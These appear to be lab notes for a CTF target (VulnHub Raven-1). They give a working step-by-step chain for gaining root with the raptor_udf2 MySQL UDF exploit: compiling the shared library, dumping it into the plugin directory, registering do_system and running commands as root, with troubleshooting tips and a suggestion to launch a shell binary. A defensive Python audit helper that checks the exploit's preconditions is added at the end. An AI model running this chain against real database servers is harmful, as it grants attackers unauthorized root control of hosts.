Lab environment:
Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3
Usable POC:
https://0xdeadbeef.info/exploits/raptor_udf2.c
https://www.exploit-db.com/exploits/1518/
Privilege escalation steps:
$ id
uid=500(raptor) gid=500(raptor) groups=500(raptor)
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
(Pitfall: the exploit-db copy writes -Wl as -W1, so the link step fails; if it will not build on the target machine, build it locally and upload the .so.)
$ mysql -u root -p
Enter password:
[...]
mysql# use mysql;
mysql# create table foo(line blob);
mysql# insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
mysql# select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
(Note: the shared library must be written to the target's MySQL plugin directory, which you can find with: show variables like "%plugin%";)
mysql# create function do_system returns integer soname 'raptor_udf2.so';
mysql# select * from mysql.func;
+-----------+-----+----------------+----------+
| name | ret | dl | type |
+-----------+-----+----------------+----------+
| do_system | 2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
mysql# select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
(At this point commands already run as root; replace id with whatever you need, e.g. select do_system('/tmp/shell.elf'); which starts a program as root.)
(Change chown raptor.raptor to match the actual user account.)
mysql# \! sh
sh-2.05b$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
[...]
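The chain above only works when three server-side conditions line up: secure_file_priv is empty (so load_file() and INTO DUMPFILE are unrestricted), plugin_dir is writable by the account mysqld runs as, and an unreviewed UDF sits in mysql.func. The following audit helper is an added example, not part of these notes or of the raptor exploit; it runs over constructed sample values (the uid/gid numbers, the allowlist and the stat fields are assumptions) and returns the findings a defender would want to act on.

```python
import stat

# Constructed sample output of:  SHOW VARIABLES LIKE '%plugin%';  and
# SHOW VARIABLES LIKE 'secure_file_priv';  captured on a server in the vulnerable state.
SAMPLE_VARIABLES = {"plugin_dir": "/usr/lib/mysql/plugin/", "secure_file_priv": ""}

# Constructed sample rows of:  SELECT name, ret, dl, type FROM mysql.func;
SAMPLE_FUNC_ROWS = [("do_system", 2, "raptor_udf2.so", "function")]

# Constructed stat fields for plugin_dir: directory, mode 0775, owned by root:mysql (assumed gid 110)
SAMPLE_PLUGIN_DIR_STAT = (0o40775, 0, 110)

# Libraries the administrator knowingly installed (assumed allowlist for the example)
KNOWN_PLUGIN_LIBS = {"auth_socket.so", "validate_password.so"}

# uid/gid that mysqld runs as (assumed values for the example)
MYSQLD_UID, MYSQLD_GID = 106, 110


def dir_writable_by(st_mode, st_uid, st_gid, uid, gid):
    """True if a process running as uid/gid can create files in a directory with these stat fields."""
    if uid == 0:
        return True
    if st_uid == uid:
        return bool(st_mode & stat.S_IWUSR)
    if st_gid == gid:
        return bool(st_mode & stat.S_IWGRP)
    return bool(st_mode & stat.S_IWOTH)


def audit(variables, func_rows, plugin_dir_stat, known_libs, mysqld_uid, mysqld_gid):
    """Return a list of findings, one per precondition of the UDF upload chain that holds."""
    findings = []
    # An empty secure_file_priv lets LOAD_FILE() and SELECT ... INTO DUMPFILE touch any path
    if variables.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv is empty; LOAD_FILE/INTO DUMPFILE are unrestricted")
    # INTO DUMPFILE writes as the mysqld user, so a writable plugin_dir is what lets the .so land
    if dir_writable_by(*plugin_dir_stat, mysqld_uid, mysqld_gid):
        findings.append(f"plugin_dir {variables['plugin_dir']} is writable by the mysqld user")
    # Any UDF whose library is not on the allowlist deserves an incident ticket
    for name, _ret, dl, _ftype in func_rows:
        if dl not in known_libs:
            findings.append(f"unexpected UDF '{name}' registered from {dl} in mysql.func")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_VARIABLES, SAMPLE_FUNC_ROWS, SAMPLE_PLUGIN_DIR_STAT,
                         KNOWN_PLUGIN_LIBS, MYSQLD_UID, MYSQLD_GID):
        print("FINDING:", finding)
```

On a real host, feed audit() the live query output and the fields of os.stat(plugin_dir) instead of the constructed samples; an empty list means none of the three preconditions is present.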
References:
http://www.91ri.org/16540.html
https://www.jianshu.com/p/5b34c1b6dee7
https://www.youtube.com/watch?v=G52yT0Gv_zc
http://www.hackingarticles.in/hack-the-raven-walkthrough-ctf-challenge/
Practice target:
https://www.vulnhub.com/entry/raven-1,256/